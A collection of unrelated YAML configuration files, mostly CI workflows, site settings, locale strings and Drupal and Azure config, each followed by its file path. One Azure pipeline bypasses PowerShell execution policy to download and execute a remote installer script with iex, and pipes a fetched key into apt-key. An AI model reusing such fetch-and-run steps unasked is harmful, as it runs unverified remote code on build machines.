cadence_number: "{{ V4_CFG_CADENCE_VERSION }}"
existing: "{{ vdm_overlays }}"
add:
- { transformers: "overlays/external-postgres/external-postgres-transformer.yaml" }
- { generators: "postgres-sas-user.yaml", vdm: true }
- { generators: "sas-go-config.yaml", vdm: true }
- { generators: "sas-postgres-config.yaml", max: "2020.0.4", vdm: true }
- { generators: "sas-postgres-config.v2.yaml", min: "2020.0.5", vdm: true }
when:
- not internal_postgres
when:
- V4_CFG_CADENCE_VERSION is version('2021.1.4', "<")
- V4_CFG_CADENCE_NAME != "fast"
tags:
- install
- uninstall
- update
- name: postgres - post 2021.1.4
block:
- name: postgres - internal
overlay_facts:
cadence_name: "{{ V4_CFG_CADENCE_NAME }}"
cadence_number: "{{ V4_CFG_CADENCE_VERSION }}"
existing: "{{ vdm_overlays }}"
add:
- { transformers: "postgres-storage-transformer.v3.yaml", vdm: true }
when:
- internal_postgres
- name: postgres - external
overlay_facts:
cadence_name: "{{ V4_CFG_CADENCE_NAME }}"
cadence_number: "{{ V4_CFG_CADENCE_VERSION }}"
existing: "{{ vdm_overlays }}"
add:
- { transformers: "overlays/external-postgres/external-postgres-transformer.yaml" }
when:
- not internal_postgres
- name: postgres - instance
include_tasks: postgres-instance.yaml
vars:
role: "{{ item.key }}"
settings: "{{ item.value }}"
internal: "{{ internal_postgres }}"
with_dict: "{{ V4_CFG_POSTGRES_SERVERS }}"
when:
- V4_CFG_CADENCE_VERSION is version('2021.1.4', ">=") or V4_CFG_CADENCE_NAME == "fast"
tags:
- install
- uninstall
- update
|
roles/vdm/tasks/postgres/postgres.yaml
|
name: Build, Test Binaries, & Release
on: [push, pull_request]
defaults:
run:
shell: bash -l {0}
jobs:
build-and-release:
runs-on: ${{ matrix.os }}
strategy:
max-parallel: 4
fail-fast: false
matrix:
os: [macos-latest, windows-latest]
node-version: [14.x]
steps:
- name: Checkout repository
uses: actions/checkout@v2
with:
fetch-depth: 0 # fetch complete history
- name: Fetch git tags
run: git fetch origin +refs/tags/*:refs/tags/*
- name: Install Node.js
uses: actions/setup-node@v2
with:
node-version: ${{ matrix.node-version }}
- name: Install Dependencies
run: |
yarn config set network-timeout 600000 -g
yarn install --verbose
- name: Fetch InVEST Binaries
run: yarn run fetch-invest
- name: Run the build script
run: yarn run build
# Steps that use github secrets do not run in pull requests.
# These include codesigning & GCS deploy-related things.
- name: Set up Python for gsutil
# gsutil requires a python, which is not included on Windows
if: github.event_name != 'pull_request' && matrix.os == 'windows-latest'
uses: actions/setup-python@v2
with:
python-version: 3.7
- name: Set up GCP
# Secrets not available in PR so don't use GCP.
if: github.event_name != 'pull_request'
uses: google-github-actions/setup-gcloud@v0.2.0
with:
version: '281.0.0'
service_account_key: ${{ secrets.GOOGLE_SERVICE_ACC_KEY }}
- name: Code-signing setup for macOS
if: github.event_name != 'pull_request' && matrix.os == 'macos-latest'
shell: bash
env:
P12_FILE_PATH: ~/Downloads/stanford_cert.p12
KEYCHAIN_NAME: codesign_keychain
KEYCHAIN_PASS: ${{ secrets.MAC_KEYCHAIN_PASS }}
CERT_KEY_PASS: ${{ secrets.STANFORD_CERT_KEY_PASS }}
run: |
gsutil cp gs://stanford_cert/Stanford-natcap-code-signing-cert-expires-2024-01-26.p12 $P12_FILE_PATH
bash ./scripts/setup_macos_keychain.sh
# these env variables tell electron-builder to do code signing
echo "CSC_KEYCHAIN=$KEYCHAIN_NAME" >> $GITHUB_ENV
echo "CSC_NAME='Stanford University'" >> $GITHUB_ENV
echo "CSC_KEY_PASSWORD=${{ secrets.STANFORD_CERT_KEY_PASS }}" >> $GITHUB_ENV
- name: Code-signing setup for Windows
if: github.event_name != 'pull_request' && matrix.os == 'windows-latest'
env:
P12_FILE: Stanford-natcap-code-signing-cert-expires-2024-01-26.p12
CLOUDSDK_PYTHON: ${{env.pythonLocation}}\python.exe
run: |
gsutil cp gs://stanford_cert/$P12_FILE ~/$P12_FILE
# all these variables are used by electron-builder
echo "CSC_LINK=~/$P12_FILE" >> $GITHUB_ENV
echo "CSC_KEY_PASSWORD=${{ secrets.STANFORD_CERT_KEY_PASS }}" >> $GITHUB_ENV
echo "CSC_IDENTITY_AUTO_DISCOVERY=false" >> $GITHUB_ENV
- name: Run electron-builder
env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
DEBUG: electron-builder
run: yarn run dist
- name: Test electron app with puppeteer
run: yarn run test-electron-app
- name: Upload app logging from puppeteer to github - MacOS
uses: actions/upload-artifact@v2.2.4
if: matrix.os == 'macos-latest' && always()
with:
name: 'macos_puppeteer_log.zip'
path: '~/Library/Logs/invest-workbench/'
- name: Upload app logging from puppeteer to github - Windows
uses: actions/upload-artifact@v2.2.4
if: matrix.os == 'windows-latest' && always()
with:
name: 'windows_puppeteer_log.zip'
path: '~/AppData/Roaming/invest-workbench/logs/'
- name: Upload installer artifacts to github
uses: actions/upload-artifact@v2.2.4
if: ${{ always() }}
with:
name: invest-workbench-${{ matrix.os }}
path: dist/invest_*_workbench_*
- name: Set variables for GCS deploy target
if: github.event_name != 'pull_request'
run: |
          echo "VERSION=$(cat .workbench_version_string.env)" >> $GITHUB_ENV
echo "BUCKET=$([ ${{ github.repository_owner }} == 'natcap' ] \
&& echo 'gs://releases.naturalcapitalproject.org/invest-workbench' \
|| echo 'gs://natcap-dev-build-artifacts/invest-workbench/${{ github.repository_owner }}' \
)" >> $GITHUB_ENV
- name: Deploy artifacts to GCS - Windows
if: github.event_name != 'pull_request' && matrix.os == 'windows-latest'
env:
CLOUDSDK_PYTHON: ${{env.pythonLocation}}\python.exe
run: |
gsutil -m rsync dist/ "${{ env.BUCKET }}/${{ env.VERSION }}/"
- name: Deploy artifacts to GCS - macOS
if: github.event_name != 'pull_request' && matrix.os == 'macos-latest'
run: |
gsutil -m rsync dist/ "${{ env.BUCKET }}/${{ env.VERSION }}/"
|
.github/workflows/build-electron.yml
|
app_name: App_name # Required
app_description: Description # Optional
profile: aws_profile # if use profile config, overwrite with --profile option
# If use credentials(key, secret)
aws_key: aws_key
aws_secret: aws_secret
stages: # Required, Hash
development: # Stage name
web: # Env name
name: web01 # Optional, default: #{env_name}-#{stage_name}
description: Description # Optional,
cname_prefix: prefix # Optional
tier: web or worker # Optional, default: web
instance_type: t2.small # Optional, default: t2.small
instance_num: # Optional, min 1 max 1
min: 1
max: 1
key_name: # Optional, if not set you cannot ssh into ec2 instances
instance_profile: iam_profile # Optional, default: aws-elasticbeanstalk-ec2-role
# http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/iam-instanceprofile.html
solution_stack_name: Ruby # Optional, default: "64bit Amazon Linux 2017.09 v2.6.0 running Ruby 2.4 (Puma)"
env_file: .env.development # Optional
environment_variables: # Optional, nil will be deleted when update,
# Use `rebi get_env stage --from-config` to get env settings
# This will be merged into variables from env_file and cfg_file
# Nil env will be deleted when deploy
- TIER: web
ebextensions: ebextension folders # Optional, String or Array of Strings
# .ebextensions will be added automatically if not exists
# The below one will be merge in to be above one
# Example: .ebextensions has 01.config, web_extensions, 02.config, web1_extensions 02.config and 03.config
# ebextensions:
# - web_extensions
# - web1_extensions
# Result will has 01.config, 02.config(from web1_extensions) and 03.config
dockerrun: Dockerrun.aws.json.stg # Dockerrun file
options: # Hash, Other custom options for using in erb
use_basic: true # rebi.opts.use_basic
ebignore: .ebignore_web # Optional
hooks:
pre: ls # String or Array, run before upload source bundle
post: ls # String or Array, run right after sending deploy request
worker:
# ...
staging:
# ...
production:
# ...
|
sample/rebi.yml
|
---
pt-BR:
views:
devise:
shared:
log_in: "Faça login"
sign_up: "Cadastre-se"
forgot_password: "<PASSWORD>ha?"
confirmation_instructions: "Não recebeu as instruções da verificação?"
        unlock_instructions: "Não recebeu as instruções do desbloqueio?"
provider_sign_in: "Autentique-se com %{provider_name}"
registrations:
create: "Crie sua conta de %{resource_name}"
        min_password_length: "%{length} caracteres no mínimo"
edit: "Troque sua senha"
awaiting_confirmation: "Aguardando verificação de conta pelo e-mail %{email}"
leave_blank: "(deixe em branco se não deseja alterar sua senha)"
        current_password: "(precisamos da tua senha atual para verificar a mudança)"
destroy: "Apagar minha conta"
destroy_confirmation: "Esta ação é irreversível. Tem certeza?"
sessions:
create: "Faça login como %{resource_name}"
remember_me: "Mantenha-me logado"
passwords:
create: "Recupere sua senha"
send_instructions: "Enviar instruções de recuperação de senha"
edit: "Troque de senha"
new_password: "<PASSWORD>"
confirm_new_password: "<PASSWORD>"
confirmations:
new: "Re-envio de instruções de verificação de %{resource_name}"
send_instructions: "Enviar instruções de verificação"
unlocks:
        new: "Re-envio de instruções de desbloqueio de %{resource_name}"
        send_instructions: "Enviar instruções de desbloqueio"
mailer:
confirmation_instructions:
          welcome: "Bem-vindo %{email}!"
instruction: "Verifique a sua conta pelo link:"
confirm_account: "Verificar minha conta"
email_changed:
          greeting: "Olá %{email}!"
email_changing_message: "Enviamos esta mensagem para te avisar que teu e-mail está sendo alterado para %{new_email}."
email_changed_message: "Enviamos esta mensagem para te avisar que teu e-mail foi alterado para %{new_email}."
password_change:
          greeting: "Olá %{email}!"
message: "Enviamos esta mensagem para te avisar que tua senha foi alterada."
reset_password_instructions:
          greeting: "Olá %{email}!"
          message1: "Alguém solicitou um link para o reset da tua senha. Você pode trocar tua senha pelo link:"
change_password: Trocar minha senha
          message2: "Se você não fez esta solicitação, por favor ignore este e-mail."
          message3: "Tua senha não mudará a menos que você acesse o link acima e crie uma nova."
unlock_instructions:
          greeting: "Olá %{email}!"
          message1: "Tua conta foi bloqueada devido a um número excessivo de tentativas de login inválidas."
message2: "Clique no link para desbloquear sua conta:"
          unlock_account: Desbloquear minha conta
|
config/locales/pt-BR/views/devise.yml
|
name: Java System CI with Gradle
on:
release:
branches: [ master ]
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/cache@v2
with:
path: |
~/hedera-nft-auction-demo-java-node/.gradle/caches
~/hedera-nft-auction-demo-java-node/.gradle/wrapper
key: ${{ runner.os }}-gradle-${{ hashFiles('**/*.gradle*', '**/gradle-wrapper.properties') }}
restore-keys: |
          ${{ runner.os }}-gradle-
- name: Set up JDK 14
uses: actions/setup-java@v2
with:
java-version: '14'
distribution: 'adopt'
- name: Grant execute permission for gradlew
run: cd hedera-nft-auction-demo-java-node && chmod +x gradlew
- name: Create certificates
run: |
cd docker-files
openssl req -config certs.cnf -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem
- name: Build with Gradle
env:
OPERATOR_ID: ${{ secrets.OPERATOR_ID }}
OPERATOR_KEY: ${{ secrets.OPERATOR_KEY }}
MASTER_KEY: ${{ secrets.OPERATOR_KEY }}
NETWORK: testnet
# Run the REST API true/false
REST_API: true
API_PORT: 8081
API_VERTICLE_COUNT: 1
# Run the admin REST API true/false
ADMIN_API_PORT: 8082
ADMIN_API_VERTICLE_COUNT: 1
HTTPS_KEY_OR_PASS: ../docker-files/key.pem
HTTPS_CERTIFICATE: ../docker-files/cert.pem
# Run the Auction Node true/false
AUCTION_NODE: true
# only if participating in refund transactions
TRANSFER_ON_WIN: true
# auction topic details
TOPIC_ID:
# mirror node detail
# the mirror provider may be hedera, kabuto or dragonglass
MIRROR_PROVIDER: hedera
MIRROR_QUERY_FREQUENCY: 5000
# Database information for transaction and event logging
DATABASE_URL: postgresql://localhost:5432/
POSTGRES_DB: nftauction
POSTGRES_USER: postgres
POSTGRES_PASSWORD: password
# REST Mirror urls
REST_HEDERA_MAINNET: mainnet.mirrornode.hedera.com
REST_HEDERA_TESTNET: testnet.mirrornode.hedera.com
# REST_HEDERA_PREVIEWNET: previewnet.mirrornode.hedera.com
REST_HEDERA_PREVIEWNET: 172.16.31.10
run: cd hedera-nft-auction-demo-java-node && ./gradlew build testSystem
|
.github/workflows/system-test.yml
|
pool:
vmImage: 'Ubuntu 18.04'
steps:
- task: UsePythonVersion@0
inputs:
versionSpec: 3.6
architecture: 'x64'
- task: DownloadSecureFile@1
name: secret
displayName: 'Download secret.py file'
inputs:
secureFile: 'secret.py'
- task: DownloadSecureFile@1
name: settings
displayName: 'Download settings.py file'
inputs:
secureFile: 'settings.py'
- task: DownloadSecureFile@1
name: startup
displayName: 'Download startup.sh file'
inputs:
secureFile: 'startup.sh'
- task: DownloadSecureFile@1
name: wsgi
displayName: 'Download wsgi.py file'
inputs:
secureFile: 'wsgi.py'
- task: PythonScript@0
displayName: 'Export project path'
inputs:
scriptSource: 'inline'
script: |
"""Search alll subdirectories for `manage.py`."""
from glob import iglob
from os import path
# Python >= 3.5
manage_py = next(iglob(path.join('**', 'manage.py'), recursive=True), None)
if not manage_py:
raise SystemExit('Could not find a Django project')
project_location = path.dirname(path.abspath(manage_py))
print('Found Django project in', project_location)
print('##vso[task.setvariable variable=projectRoot]{}'.format(project_location))
- script: |
cp $(secret.secureFilePath) /home/vsts/work/1/s/secret.py
cp $(settings.secureFilePath) /home/vsts/work/1/s/settings.py
cp $(startup.secureFilePath) /home/vsts/work/1/s/startup.sh
cp $(wsgi.secureFilePath) /home/vsts/work/1/s/wsgi.py
displayName: 'Copy files to build agent'
- task: ShellScript@2
inputs:
scriptPath: filecopy.sh
cwd: '/'
- script: |
python -m pip install --upgrade pip setuptools wheel django
pip install -r requirements_docker.txt
pip install unittest-xml-reporting
displayName: 'Install prerequisites'
- script: |
pushd '$(projectRoot)'
python manage.py test --testrunner xmlrunner.extra.djangotestrunner.XMLTestRunner --no-input
condition: succeededOrFailed()
displayName: 'Run tests'
- task: PublishTestResults@2
condition: succeededOrFailed()
inputs:
testResultsFiles: "**/TEST-*.xml"
testRunTitle: 'Python $(PYTHON_VERSION)'
- task: Docker@2
displayName: Login to Azure Container Registry
inputs:
command: login
containerRegistry: MyContainerRegistry
- task: Docker@2
displayName: Build and Push to ACR
inputs:
command: buildAndPush
repository: prop_dev
|
azure-pipelines.yml
|
name: Azure_Kinect_ROS_Driver-$(SourceBranchName)-$(Date:yyyyMMdd)-$(Rev:rrr)
trigger:
batch: true
branches:
include:
- master
- develop
- melodic
pr:
autoCancel: true
branches:
include:
- master
- develop
- melodic
jobs:
- job: WindowsMelodic
displayName: Windows Melodic
pool:
vmImage: 'vs2017-win2016'
steps:
- checkout: self
clean: "all"
fetchDepth: 20
lfs: false
persistCredentials: true
submodules: true
path: catkin_ws\src\Azure_Kinect_ROS_Driver
# Install Chocolatey
- powershell: Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
# Install ROS
- powershell: |
choco source add -n=ros-win -s="https://roswin.azurewebsites.net/api/v2" --priority=1
choco upgrade ros-melodic-ros_base -y --execution-timeout=0
# Create a catkin workspace
- script: |
C:\opt\ros\melodic\x64\setup.bat
mkdir %BUILD_SOURCESDIRECTORY%\catkin_ws
mkdir %BUILD_SOURCESDIRECTORY%\catkin_ws\src
cd %BUILD_SOURCESDIRECTORY%\catkin_ws
catkin_make
displayName: Create Catkin Workspace
# Download and install the Azure Kinect Sensor SDK
- powershell: |
wget http://download.microsoft.com/download/1/9/8/198048e8-63f2-45c6-8f96-1fd541d1b4bc/Azure%20Kinect%20SDK%201.2.0.msi -OutFile $(Build.SourcesDirectory)\sdk.msi
$(Build.SourcesDirectory)\sdk.msi /passive
# Build the catkin workspace
- script: |
C:\opt\ros\melodic\x64\setup.bat
cd %BUILD_SOURCESDIRECTORY%\catkin_ws
catkin_make --force-cmake
displayName: Build ROS Driver Node
- job: LinuxMelodic
displayName: Linux Melodic
pool:
vmImage: 'ubuntu-16.04'
container:
image: ros:melodic-perception-bionic
options: "--name ci-container -v /usr/bin/docker:/tmp/docker:ro"
steps:
- script: |
/tmp/docker exec -t -u 0 ci-container \
sh -c "apt-get update && DEBIAN_FRONTEND=noninteractive apt-get -o Dpkg::Options::="--force-confold" -y install sudo"
displayName: Enable sudo
- checkout: self
clean: "all"
fetchDepth: 20
lfs: false
persistCredentials: true
submodules: true
path: catkin_ws/src/Azure_Kinect_ROS_Driver
# Download and install the Azure Kinect Sensor SDK
- bash: |
sudo apt-get -y install curl software-properties-common
curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
sudo apt-add-repository https://packages.microsoft.com/ubuntu/18.04/prod
sudo apt-get update
echo libk4a1.2 libk4a1.2/accept-eula boolean true | sudo debconf-set-selections
echo libk4a1.2 libk4a1.2/accepted-eula-hash string 0f5d5c5de396e4fee4c0753a21fee0c1ed726cf0316204edda484f08cb266d76 | sudo debconf-set-selections -u
sudo apt-get -y install libk4a1.2-dev
displayName: Install the Azure Kinect Sensor SDK
# Build the catkin workspace
- bash: |
source /opt/ros/melodic/setup.bash
catkin_make --force-cmake
displayName: Build ROS Driver Node
workingDirectory: ../../
|
azure-pipelines.yml
|
menu:
- {name: 'About', url: 'pages/about.html'}
- {name: 'Projects', url: ''}
# - {name: 'Resume', url: 'pages/resume.html'}
- {name: 'Resume', url: "pages/artia_resume.pdf"}
- {name: 'Contact', url: 'pages/contact.html'}
#-------------------------------
# SEO Section
# NOTE: Providing SEO information will make this website more searchable on the internet.
seo:
description: 'Personal portfolio powered by Jekyll and GitHub Pages'
rel-author: 'https://plus.google.com/u/0/#'
rel-publisher: 'https://plus.google.com/u/0/#'
#-------------------------------
# Google Analytics Section
# Analytics helps you understand who visits your website.
# Learn more at: http://support.google.com/analytics/answer/1008065
# NOTE: If you want to use Google Analytics for basic web tracking: Just uncomment and enter your UA-Code here.
# If you are not using Google Analytics, please change 'google-ID' to an empty string
google-analytics-ua: 'UA-112060364-3'
#-------------------------------
# Disqus Section
# Change to true for Disqus comments
disqus:
comments: false
disqus_shortname: 'thathungrymind'
#-------------------------------
# About Section
about: >
Hi! I am a Graduate student at the Robotics Institute in Carnegie Mellon University, pursuing my Master's in Robotic Systems Development. From September 2019 to December 2020, advised by Prof. <NAME>, I developed a robotic surgical system that can localize embedded liver tumors.
My most recent work experience was at Johnson & Johnson, in the Robotics & Digital Surgery group where I defined functional requirements for a robot arm to perform manipulation tasks, and also automated the testing of critical robotic faults.
In the past, I have had the opportunity to spend two summers interning at <NAME>ufacturing Solutions GmbH where I programmed collaborative robots to perform specific tasks to meet end-user requirements.
Within the robotics domain, my areas of interest are motion planning, robot controls, spatial kinematics, rigid body transformations, and point-cloud registration techniques.
contact: >
Thank you for stopping by! If you would like to discuss my work further, please reach out to me at [<EMAIL>](mailto:<EMAIL>).
#-------------------------------
# Work Section
resume: >
# Resume
projects:
- {name: 'Augmented Reality for Minimally Invasive Surgery', folder: 'proj-1', file: 'projects/proj-1.html'}
- {name: 'Planning for a High-DOF Planar Arm', folder: 'proj-2', file: 'projects/proj-2.html'}
- {name: 'Robotic Bin Picking', folder: 'proj-3', file: 'projects/proj-3.html'}
- {name: 'Catch a Moving Target', folder: 'proj-4', file: 'projects/proj-4.html'}
- {name: 'Path Planning on Constraint Manifolds', folder: 'proj-5', file: 'projects/proj-5.html'}
- {name: 'Spatial Kinematics of a 7-DoF Robotic Arm', folder: 'proj-6', file: 'projects/proj-6.html'}
- {name: 'Extended Kalman Filter for 2D SLAM', folder: 'proj-7', file: 'projects/proj-7.html'}
- {name: 'Control and Trajectory Generation of a Quadcopter', folder: 'proj-8', file: 'projects/proj-8.html'}
- {name: 'Object Tracking', folder: 'proj-9', file: 'projects/proj-9.html'}
#-------------------------------
# Contact Section
social:
- {icon: 'github', link: 'https://github.com/ArtiAnantharaman'}
- {icon: 'linkedin', link: 'https://www.linkedin.com/in/arti-anantharaman'}
- {icon: 'envelope', link: 'mailto:<EMAIL>'}
|
_data/settings.yml
|
langcode: en
status: true
dependencies:
module:
- tour_getting_started
id: getting-started
label: 'User Page After Login'
module: tour_getting_started
routes:
-
route_name: entity.user.canonical
tips:
admin-menu:
id: admin-menu
plugin: text
label: 'Admin Menu'
weight: -100
attributes:
data-id: toolbar-item-administration
body: 'Do you see the admin menu? Click the Manage toggle button to display the admin menu if it does not already display for you. Then restart this tour by clicking the blue tour button at the top right of this screen.'
location: top
manage-your-content:
id: manage-your-content
plugin: text
label: 'Manage your content'
weight: -99
attributes:
data-class: toolbar-icon-system-admin-content
body: 'See all your existing content by clicking the "Content" menu item.'
location: bottom
add-a-new-page:
id: add-a-new-page
plugin: text
label: 'Add a new page'
weight: -98
attributes:
data-class: toolbar-icon-system-admin-content
body: 'To add a new page go to Content > Add Content and choose the type of content you would like to create.'
location: bottom
edit-menu-items:
id: edit-menu-items
plugin: text
label: 'Structure Menu'
weight: -97
attributes:
data-class: 'toolbar-menu > li > .toolbar-icon-system-admin-structure'
body: 'To edit Menus, Taxonomies, and Webforms, hover over the Structure menu and choose an item to edit. '
location: bottom
appearance-menu:
id: appearance-menu
plugin: text
label: 'Appearance Menu'
weight: -96
attributes:
data-class: toolbar-icon-system-themes-page
body: 'Appearance is where your theme is turned on. Exercise extreme caution. You will not need to edit anything here.'
location: bottom
extend-menu:
id: extend-menu
plugin: text
label: 'Extend Menu'
weight: -95
attributes:
data-class: toolbar-icon-system-modules-list
body: 'This is where modules are installed and activated. Do not modify, uninstall, or update any modules as this could cause sitewide issues to occur.'
location: bottom
configuration:
id: configuration
plugin: text
label: 'Configuration Menu'
weight: -94
attributes:
data-class: toolbar-icon-system-admin-config
body: 'Exercise extreme caution within the configuration menu. The majority of content administrators will NOT need to modify anything here. Contact your web master with any questions.'
location: bottom
manage-users:
id: manage-users
plugin: text
label: 'Manage Users'
weight: -93
attributes:
data-class: toolbar-icon-entity-user-collection
body: 'Add new users and manage existing users under the People menu item. You can also assign different roles to different users. For example, Administrators vs Content Editors.'
location: bottom
reports-menu:
id: reports-menu
plugin: text
label: 'Reports Menu'
weight: -92
attributes:
data-class: 'toolbar-menu > li > .toolbar-icon-system-admin-reports'
body: 'Reports provide information about your website including available updates, log messages, and status reports such as your Drupal version, web server, php version, and any errors or warnings.'
location: bottom
help-menu:
id: help-menu
plugin: text
label: 'Help Menu'
weight: -91
attributes:
data-class: toolbar-icon-help-main
body: 'Typically used by developers and web masters, the help menu provides resource links to Drupal documentation and definitions.'
location: bottom
edit-a-page:
id: edit-a-page
plugin: text
label: 'Edit a page'
weight: -90
attributes:
data-class: 'tabs--primary a[href*="/edit"]'
body: 'When you''re logged in you can edit most pages by clicking the "edit" link attached to the bottom of your screen.'
location: top
|
web/modules/backofficethinking/backoffice_thinking_tours/config/install/tour.tour.getting-started.yml
|
uid: management.azure.com.backup.jobs.export
name: Export
service: Recovery Services - Backup
groupName: Jobs
apiVersion: 2017-07-01
summary: Triggers export of jobs specified by filters and returns an OperationID to track.
consumes:
- application/json
produces:
- application/json
paths:
- content: POST https://management.azure.com/Subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupJobsExport?api-version=2017-07-01
- content: POST https://management.azure.com/Subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupJobsExport?api-version=2017-07-01&$filter={$filter}
isOptional: true
uriParameters:
- name: subscriptionId
in: path
isRequired: true
description: The subscription Id.
types:
- uid: string
- name: resourceGroupName
in: path
isRequired: true
description: The name of the resource group where the recovery services vault is present.
types:
- uid: string
- name: vaultName
in: path
isRequired: true
description: The name of the recovery services vault.
types:
- uid: string
- name: api-version
in: query
isRequired: true
description: Client Api Version.
types:
- uid: string
- name: $filter
in: query
description: OData filter options.
types:
- uid: string
responses:
- name: 202 Accepted
description: Accepted
requestHeader: []
definitions: []
examples:
- name: Export Jobs
request:
uri: POST https://management.azure.com/Subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/SwaggerTestRg/providers/Microsoft.RecoveryServices/vaults/NetSDKTestRsVault/backupJobsExport?api-version=2017-07-01
responses:
- statusCode: "202"
headers:
- name: Location
value: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/SwaggerTestRg/providers/Microsoft.RecoveryServices/vaults/NetSDKTestRsVault/backupJobs/operationResults/00000000-0000-0000-0000-000000000000?api-version=2017-07-01
- name: Retry-After
value: "60"
security:
- type: oauth2
description: Azure Active Directory OAuth2 Flow
flow: implicit
authorizationUrl: https://login.microsoftonline.com/common/oauth2/authorize
scopes:
- name: user_impersonation
description: impersonate your user account.
|
docs-ref-autogen/backup/Jobs/Export.yml
|
layout: sidebar
style: light
plugins:
- jekyll-octicons
- jekyll-github-metadata
- jemoji
permalink: /:year/:month/:day/:title/
defaults:
-
scope:
path: "" # an empty string here means all files in the project
type: "posts"
values:
layout: "post"
projects:
sort_by: pushed
# sort_by options:
# - pushed
# - stars
limit: 12
exclude:
forks: true
projects:
# - repo-name
social_media:
# behance: your_username
# dribbble: your_username
# facebook: your_username
# hackerrank: your_username
# instagram: your_username
# keybase: your_username
medium: "@jvandenaardweg"
# stackoverflow: your_user_id
# telegram: your_username
# dribbble: your_username
linkedin: "jvandenaardweg"
stackoverflow: "3194288"
medium: "@jvandenaardweg"
# twitter: your_username
# unsplash: your_username
# vk: your_username
# website: http://your_website_url
# youtube: your_username
topics:
- name: JavaScript
web_url: https://github.com/topics/javascript
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/javascript/javascript.png
- name: TypeScript
web_url: https://github.com/topics/typescript
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/typescript/typescript.png
- name: React
web_url: https://github.com/topics/react
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/react/react.png
- name: Node
web_url: https://github.com/topics/node
image_url: https://raw.githubusercontent.com/github/explore/fd96fceccf8c42c99cbe29cf0f8dcc4736fcb85a/topics/nodejs/nodejs.png
- name: Vue
web_url: https://github.com/topics/vue
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/vue/vue.png
- name: React Native
web_url: https://github.com/topics/react-native
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/react-native/react-native.png
- name: Redux
web_url: https://github.com/topics/redux
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/redux/redux.png
- name: PostgreSQL
web_url: https://github.com/topics/postgresql
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/postgresql/postgresql.png
- name: Docker
web_url: https://github.com/topics/docker
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/docker/docker.png
- name: Express
web_url: https://github.com/topics/express
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/express/express.png
- name: Webpack
web_url: https://github.com/topics/webpack
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/webpack/webpack.png
- name: Git
web_url: https://github.com/topics/git
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/git/git.png
- name: npm
web_url: https://github.com/topics/npm
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/npm/npm.png
- name: SASS
web_url: https://github.com/topics/sass
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/sass/sass.png
|
_config.yml
|
features.export:
path: '/admin/config/development/configuration/features'
defaults:
_form: '\Drupal\features_ui\Form\FeaturesExportForm'
_title: 'Features'
requirements:
_permission: 'export configuration'
features.assignment:
path: '/admin/config/development/configuration/features/bundle/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentConfigureForm'
_title: 'Bundle assignment'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.assignment_base:
path: '/admin/config/development/configuration/features/bundle/_base/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentBaseForm'
_title: 'Configure base package assignment'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.assignment_core:
path: '/admin/config/development/configuration/features/bundle/_core/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentCoreForm'
_title: 'Configure core package assignment'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.assignment_exclude:
path: '/admin/config/development/configuration/features/bundle/_exclude/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentExcludeForm'
_title: 'Configure package exclusion'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.assignment_optional:
path: '/admin/config/development/configuration/features/bundle/_optional/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentOptionalForm'
_title: 'Configure optional package assignment'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.assignment_profile:
path: '/admin/config/development/configuration/features/bundle/_profile/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentProfileForm'
_title: 'Configure profile package assignment'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.assignment_site:
path: '/admin/config/development/configuration/features/bundle/_site/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentSiteForm'
_title: 'Configure site package assignment'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.edit:
path: '/admin/config/development/configuration/features/edit/{featurename}'
defaults:
_form: '\Drupal\features_ui\Form\FeaturesEditForm'
_title: 'Edit'
featurename: ''
requirements:
_permission: 'administer site configuration'
features.diff:
path: '/admin/config/development/configuration/features/diff/{featurename}'
defaults:
_form: '\Drupal\features_ui\Form\FeaturesDiffForm'
_title: 'Differences'
featurename: ''
requirements:
_permission: 'administer site configuration'
features.detect:
